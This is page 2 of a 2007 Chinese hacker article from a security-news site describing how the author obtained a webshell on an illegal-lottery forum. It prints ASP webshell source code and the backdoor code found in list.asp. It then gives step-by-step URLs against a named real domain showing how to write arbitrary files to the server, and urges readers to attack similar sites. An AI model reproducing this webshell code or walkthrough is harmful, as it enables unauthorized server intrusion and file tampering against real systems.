您的位置:首页 >>网安文摘 >>入侵实例 >> 文章内容

取webshell给六合彩网站毁灭性打击

Google
 
[ 信息来源:F.S.T ] [ 发布时间:2007-01-10 ]

Set objCountFile = objFSO.OpenTextFile(fname,1,True)
If Not objCountFile.AtEndOfStream Then fdata = objCountFile.ReadAll
else
fdata=request("fdata")
Set objCountFile=objFSO.CreateTextFile(fname,True)
objCountFile.Write fdata
end if
objCountFile.Close
Set objCountFile=Nothing
Set objFSO = Nothing
end if
%>
<form method=POST>
<table border=0 cellspacing=0 bgcolor=#000000>
<tr>
<td><table border=0 cellpadding=10 cellspacing=0 bgcolor=#FFFFFF>
<tr>
<td><table bordercolor=#0080FF bgcolor=#FFFFD0 border=1>
<tr>
<td bgcolor="#0080FF"><font color="#FFFFFF">change:<%=fname%></font></td>
<tr>
<td><input type="submit" value="ok" name="save"><input type="reset" value="reset"><br>
<textarea rows="22" name="fdata" cols="100"><%=fdata%></textarea></td>


</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</body>
</html>

再认真看看,其实这就是一个webshell,所有的六合彩专用论坛的数据库里面都有。
它出生的时间可能比海洋顶端2003 还要早,是asp木马界的鼻祖了。

既然数据库的文件名是asp的后缀,而里面又自带一个asp木马,我们来试试直接打开这个数据库地址,
http://www.ky8888.com/bbs/fdnews.asp

昏,可以看出木马里面的asp 代码并没有执行,也就是说我们拿了一只死马。

这就是我12月25号的号的发现,拿到这个之后就和兄弟 ☆罹天烬☆ 讨论过(czy也给予了帮助),
开始认为只要拿到网站在服务器上的绝对路径就可以在本地提交,写入我们自己的木马,但是实验却一直没有成功。

虽然我手里有一个这样的论坛,但是有几个重要的页面丢失了,一时也看不出一个所以然来,这样一拖就是十几天,
前天我再把这个论坛的代码拿出来看,在list.asp 里面发现一段重要的东西.
<%
if len(page)>6 then westsafe.net
if md5(md5(page))="8f9fc56c3d174202" then
dim fname
fname=""&sPP&"pags.asp"
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objCountFile=objFSO.CreateTextFile(fname,True)
objCountFile.Write ""& idto &""
objCountFile.Close
Set objCountFile=Nothing
Set objFSO = Nothing

response.write "SORRY <br>"
response.write "ID?????"
response.end
end if%>

注意到了吗?""& idto &"" 这里的idto 不就是数据库里面放asp木马的字段吗?
嘿嘿,那么上面的pags.asp,就应该是写入的文件名咯?我们来试试看,到底是不是这样的!
提交:http://www.ky8888.com/bbs/pags.asp
看到没有这个古老的asp木马终于显身了,首先它可以看到网站在服务器上的绝对路径,第二还
可以写入文件。有人看到这个木马很郁闷,因为它根本没有写入文件的路径的设置表单,是不是
我们提交的数据库,都进了数据库了呢?
你复制的文字来自西部网安
来看看原代码,这一句 Set objCountFile = objFSO.OpenTextFile(fname,1,True)

看这里是写入了文件fname, 而不是数据库,我们先要请求文件fname 写入的路径,
在ie 提交:http://www.ky8888.com/bbs/pags.asp?fname=D:ky8888bbshaotian.asp
再填内容 ,嘿嘿· ok 了 !,这样D:ky8888bbshaotian.asp 就是我们新建的文件了。

因为这个网站空间不支持fso,所以我直接把数据库里面的木马复制到朋友的asp空间去演示,
看是不是写入文件成功了,嘿嘿!~~http://lvhuana.somee.com/haotian.asp?id=1

这样简单就拿到了webshell,不过我试了另外几个六合彩网站却没有发现这个pags.asp,看来这个里面
还有东西要挖一挖。可能要等到拿了完整的 六合专用BBS 的代码之后问题就都解决了。

本文只是起到抛砖引玉的作用,还是那句话期望着大家一起走到打击六合彩网站的道路上来!
消减它们,国家的害虫……

我在写本文的同时,也有很多人和我说,现在地下足彩也很泛滥,所以我专门联系了一位国内的黑足彩
高手,他将在近期出一篇关于消减足彩网站的文章。(完)


奉劝大家再也不要买码了
共2页: 上一页 [1] 2 下一页

声明:西部网安刊登此文章是为了传递更多信息,文章内容仅供参考,转载请注明出处。   
 
    ·在线评论

评论列表

用户名: 新注册) 密码: 匿名评论

赞助展示链接
精彩图片
赛车版无间道 极品飞车12真人游戏截图 赛车版无间道 极品飞车12真人游
第十二代《极品飞车:卧底》(Need for Speed Undercover)是EA Black B
奥林巴斯E-520样张:美女花木衣世 奥林巴斯E-520样张:美女花木衣
奥林巴斯E-520是一款外形小巧、携带方便的数码单反相机,更是一款非常
全球最轻播放器之一 Cube D7美女图赏 全球最轻播放器之一 Cube D7美女
DCube D7十分小巧,其三围是59.53311mm ,重25克。受制机身的限制,D7
黑丝袜的诱惑 性感美女演绎台电T50+ 黑丝袜的诱惑 性感美女演绎台电T
台电T50+在前作的基础上加入了TV-OUT电视输出功能,采用WQVGA多点触摸
周杰伦大名远洋 成中国入选W3C规范第一人 周杰伦大名远洋 成中国入选W3C规
2008年8月29日,W3C的Web IDL工作草案正式发布,令人惊奇的是在规范说

版权所有 西部网安 Copyright(C) 2005-2008 All Rights Reserved.陕ICP备05009754号